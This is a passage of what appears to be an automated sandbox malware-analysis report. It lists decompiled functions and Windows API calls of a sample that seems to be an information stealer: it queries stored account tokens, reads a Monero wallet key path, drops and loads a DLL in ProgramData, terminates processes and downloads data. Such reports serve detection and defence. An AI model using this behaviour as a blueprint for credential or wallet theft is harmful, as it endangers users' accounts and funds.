                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • lstrlen.KERNEL32(00000000), ref: 0081BC6F
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0081BC9D
                              • lstrlen.KERNEL32(00000000), ref: 0081BD75
                              • lstrlen.KERNEL32(00000000), ref: 0081BD89
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: fc892b802ba619198674f2e12eec342b2175d0263802e064aab1952ee8dfd670
                              • Instruction ID: ffcf29170fdd6ca87c5ae2a28816d4a1f8911d7c6026c8d56a9dad2b8f77851f
                              • Opcode Fuzzy Hash: fc892b802ba619198674f2e12eec342b2175d0263802e064aab1952ee8dfd670
                              • Instruction Fuzzy Hash: E1B1ED729101289BCB18EBA4EDA6EEE7339FF54310F404558F506F6191EF346A89CB63
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 707a93d08efa7d7be0c1e79fa841f5bcbe0f094e16112a5205955596f98cddc1
                              • Instruction ID: 8e483c0cb21eeab4d6eb6403be6b6958d7003ac31fea3e5cfffd16e7f7c36894
                              • Opcode Fuzzy Hash: 707a93d08efa7d7be0c1e79fa841f5bcbe0f094e16112a5205955596f98cddc1
                              • Instruction Fuzzy Hash: EDF05E3094C399EFD348DFE0E84979CBB30FF04707F114295F60A9A1A0D6704A919B51
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00829850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,008208DC,C:\ProgramData\chrome.dll), ref: 00829871
                                • Part of subcall function 0081A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0081A098
                              • StrCmpCA.SHLWAPI(00000000,015F8970), ref: 00820922
                              • StrCmpCA.SHLWAPI(00000000,015F8980), ref: 00820B79
                              • StrCmpCA.SHLWAPI(00000000,015F88F0), ref: 00820A0C
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00820C35
                              Strings
                              • C:\ProgramData\chrome.dll, xrefs: 008208CD
                              • C:\ProgramData\chrome.dll, xrefs: 00820C30
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                              • API String ID: 585553867-663540502
                              • Opcode ID: a390b788fa9f64dec8af694514aec4f57a80148c54287c3d6d4ab28c624bdca6
                              • Instruction ID: b588ff8ce3286c1e9b6e2487b1cb1ca2bda312c8c7cd8738ff2d5fb87e34174a
                              • Opcode Fuzzy Hash: a390b788fa9f64dec8af694514aec4f57a80148c54287c3d6d4ab28c624bdca6
                              • Instruction Fuzzy Hash: 47A143717001189FCB1CEF68D996AED777AFF94300F508569E80A9F352DA309A45CB93
                              APIs
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                              • wsprintfA.USER32 ref: 00819E7F
                              • lstrcat.KERNEL32(00000000,?), ref: 00819F03
                              • lstrcat.KERNEL32(00000000,?), ref: 00819F17
                              • lstrcat.KERNEL32(00000000,008312D8), ref: 00819F29
                              • lstrcpy.KERNEL32(?,00000000), ref: 00819F7C
                              • Sleep.KERNEL32(00001388), ref: 0081A013
                                • Part of subcall function 008299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008299C5
                                • Part of subcall function 008299A0: Process32First.KERNEL32(0081A056,00000128), ref: 008299D9
                                • Part of subcall function 008299A0: Process32Next.KERNEL32(0081A056,00000128), ref: 008299F2
                                • Part of subcall function 008299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00829A4E
                                • Part of subcall function 008299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00829A6C
                                • Part of subcall function 008299A0: CloseHandle.KERNEL32(00000000), ref: 00829A79
                                • Part of subcall function 008299A0: CloseHandle.KERNEL32(0081A056), ref: 00829A88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                              • String ID: D
                              • API String ID: 531068710-2746444292
                              • Opcode ID: 9cc46c63164b095050aff965efc666f6097070ce18e0beaa50253447132dd17b
                              • Instruction ID: 56b162b3dadd4d4995eebd6705649382a01ce0c53a7a729e4e3958b0ed3d1323
                              • Opcode Fuzzy Hash: 9cc46c63164b095050aff965efc666f6097070ce18e0beaa50253447132dd17b
                              • Instruction Fuzzy Hash: 025152B1944318ABDB24DBA4DC8AFDA7778BF44700F004598F60DAA2C1EA75AB84CF55
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 0088FA1F
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0088FA27
                              • _ValidateLocalCookies.LIBCMT ref: 0088FAB0
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0088FADB
                              • _ValidateLocalCookies.LIBCMT ref: 0088FB30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction ID: 24fdd351602af9826ba8fd03a372a37a1ce6eb3de5261f93c2a51896fd8ee7ec
                              • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction Fuzzy Hash: 96417235A00219AFCF14EF6CC884A9E7BB5FF49328F148165EA19EB392D7319905CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081501A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00815021
                              • InternetOpenA.WININET(00830DE3,00000000,00000000,00000000,00000000), ref: 0081503A
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00815061
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00815091
                              • InternetCloseHandle.WININET(?), ref: 00815109
                              • InternetCloseHandle.WININET(?), ref: 00815116
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8ebf6af54f81f7fa9e8e4c8b8bffb8381438926be5ed4aa8e56db89665e19951
                              • Instruction ID: 72186b96d185a34ff6b40c7b7b7618e4eb8df11f92d4c942439e14c92cc2eb18
                              • Opcode Fuzzy Hash: 8ebf6af54f81f7fa9e8e4c8b8bffb8381438926be5ed4aa8e56db89665e19951
                              • Instruction Fuzzy Hash: 7131F5B4A04218ABDB24CF94DC85BDCB7B4FB48304F1081D8AA09A7280C6706AC58F98
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015FDC20,00000000,?,00830E14,00000000,?,00000000), ref: 008282C0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008282C7
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008282E8
                              • wsprintfA.USER32 ref: 0082833C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: a205dc79e0470dee0a459b87fccd70ff61f502ce7e4cad251daab8a52ee625da
                              • Instruction ID: 64cd89721d35c1424c8b2f6ae2c0febf40668d82853cfb866b443595b20312d4
                              • Opcode Fuzzy Hash: a205dc79e0470dee0a459b87fccd70ff61f502ce7e4cad251daab8a52ee625da
                              • Instruction Fuzzy Hash: D5211AB1E44359ABDB00DFD8DC4AFAEBBB8FB44B14F104509F615BB280C77869018BA5
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008285B6
                              • wsprintfA.USER32 ref: 008285E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0082860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0082861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828629
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • RegQueryValueExA.ADVAPI32(00000000,015FDC08,00000000,000F003F,?,00000400), ref: 0082867C
                              • lstrlen.KERNEL32(?), ref: 00828691
                              • RegQueryValueExA.ADVAPI32(00000000,015FDBD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00830B3C), ref: 00828729
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828798
                              • RegCloseKey.ADVAPI32(00000000), ref: 008287AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 5da7e1841a335395e0e1e3343f05eee8faadb604dde10dc74962537d1d2c2a7c
                              • Instruction ID: 7e22659acfd86812a8abbb6fb870a5af43bba20102e247052aeb0e207e9d4f75
                              • Opcode Fuzzy Hash: 5da7e1841a335395e0e1e3343f05eee8faadb604dde10dc74962537d1d2c2a7c
                              • Instruction Fuzzy Hash: 9A21EA7191122CABDB24DB54DC85FE9B3B8FB48704F1085D8A609A6180DF716A85CF94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008299C5
                              • Process32First.KERNEL32(0081A056,00000128), ref: 008299D9
                              • Process32Next.KERNEL32(0081A056,00000128), ref: 008299F2
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00829A4E
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00829A6C
                              • CloseHandle.KERNEL32(00000000), ref: 00829A79
                              • CloseHandle.KERNEL32(0081A056), ref: 00829A88
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: c8e742d51460661f44df26156421b267fb891c253a60abf8af8c76cd4815370f
                              • Instruction ID: 9ec7b81cc5c60a1cde980499f49fccee49a092ec10201346997f28d14b7dc079
                              • Opcode Fuzzy Hash: c8e742d51460661f44df26156421b267fb891c253a60abf8af8c76cd4815370f
                              • Instruction Fuzzy Hash: 0C21EA71904328ABDB21DFA5EC88BDDB7B5FB48304F1041C8E50AAA290D7749EC5CF50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827834
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0082783B
                              • RegOpenKeyExA.ADVAPI32(80000002,015EB968,00000000,00020119,00000000), ref: 0082786D
                              • RegQueryValueExA.ADVAPI32(00000000,015FDB18,00000000,00000000,?,000000FF), ref: 0082788E
                              • RegCloseKey.ADVAPI32(00000000), ref: 00827898
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 241aa7e22fb95efbf153d5bf47f4a327ac2f72f19e100813a615495885559f15
                              • Instruction ID: 4fed0635a343183ca30ebf22b3ee390568ca4640b77cccc92a81e72e02676008
                              • Opcode Fuzzy Hash: 241aa7e22fb95efbf153d5bf47f4a327ac2f72f19e100813a615495885559f15
                              • Instruction Fuzzy Hash: CA014F75A48349FBEB00DBE5ED89FAE7778EB48700F004198FB04EA290E6709941CB50
                              APIs
